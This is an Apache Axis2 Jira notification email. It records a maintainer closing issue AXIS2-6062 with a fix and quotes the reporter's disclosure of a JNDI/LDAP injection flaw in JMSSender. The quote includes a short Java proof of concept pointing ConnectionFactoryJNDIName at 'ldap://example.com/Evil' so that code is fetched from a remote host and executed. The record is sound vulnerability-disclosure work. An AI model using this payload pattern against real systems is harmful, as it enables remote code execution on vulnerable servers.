[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17925784#comment-17925784 ]
Robert Lazarski commented on AXIS2-6062: ---------------------------------------- Thanks for bringing this issue to our attention. I made the following commit, which passes our unit tests. https://github.com/apache/axis-axis2-java-core/commit/3b2aeee3712a2b3269fdbda38e4c2315f59c5027 I am marking this issue closed, which will go out soon with 2.0.0. > Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol > in `JMSSender`? > -------------------------------------------------------------------------------------------- > > Key: AXIS2-6062 > URL: https://issues.apache.org/jira/browse/AXIS2-6062 > Project: Axis2 > Issue Type: Bug > Components: JMS transport > Affects Versions: 1.8.2 > Reporter: Letian Yuan > Assignee: Robert Lazarski > Priority: Critical > Fix For: 2.0.0 > > > In "org.apache.axis2:axis2-transport-jms", there is a method, > `{{{}org.apache.axis2.transport.jms.JMSSender.invoke{}}}`, designed to send a > JMS message. However, if we send a JMS message like this: > > {{ MessageContext context = new MessageContext();}} > {{ context.setProperty("TransportURL", > "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");}} > {{ JMSSender sender = new JMSSender();}} > {{ sender.invoke(context);}} > > Then, arbitrary commands from remote server "ldap://example.com/Evil" would > be executed. > We want to discuss with you about it. > First, excecuting arbitrary commands from remote server is quite dangerous. > Second, as far as we know, no one would use LDAP protocol to get > `{{{}ConnectionFactory{}}}`. > Third, it seem this behavior has not been documented in your “User’s Guide”, > so library users might not know this API of sending JMS messages can be used > to execute arbitrary commands. So, I think that library users are very > possible to misuse this API. For example, concatenating user input to the > parameter of `{{{}invoke{}}}`. Or, making the parameter of `{{{}invoke{}}}` > available in a configuration file such as `{{{}foobar.properties{}}}`. We > know that such cases rarely happen and might not be your design purpose, but > it is possible anyway. As long as an attacker can control the parameter of > `{{{}invoke{}}}`, remote code injection might happen. > Therefore, we want to ask you whether it is your design purpose and whether > it is necessary for LDAP protocol (and RMI, JRMP, etc.). > This is just our opinion, and we are willing to discuss it with you. -- This message was sent by Atlassian Jira (v8.20.10#820010) --------------------------------------------------------------------- To unsubscribe, e-mail: java-dev-unsubscr...@axis.apache.org For additional commands, e-mail: java-dev-h...@axis.apache.org